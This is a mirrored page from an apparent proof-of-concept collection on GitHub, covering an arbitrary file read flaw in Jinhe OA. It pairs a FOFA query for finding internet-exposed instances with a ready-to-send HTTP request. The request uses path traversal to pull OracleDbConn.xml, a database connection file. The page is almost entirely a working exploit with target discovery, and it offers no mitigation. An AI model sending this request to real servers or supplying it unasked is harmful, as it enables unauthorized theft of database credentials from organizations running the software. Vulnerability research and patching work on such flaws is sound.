mirror of
https://github.com/eeeeeeeeee-code/POC.git
synced 2025-08-13 03:16:31 +00:00
16 lines
364 B
Markdown
16 lines
364 B
Markdown
## 金和OA任意文件读取漏洞
|
|
|
|
## fofa
|
|
```
|
|
app="金和网络-金和OA"
|
|
```
|
|
|
|
## POC
|
|
```
|
|
GET /C6/JHSoft.WCF/FunctionNew/FileUploadMessage.aspx?filename=../../../C6/JhSoft.Web.Dossier.JG/JhSoft.Web.Dossier.JG/XMLFile/OracleDbConn.xml HTTP/1.1
|
|
Host: 127.0.0.1
|
|
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
|
|
Accept: */*
|
|
Connection: Keep-Alive
|
|
```
|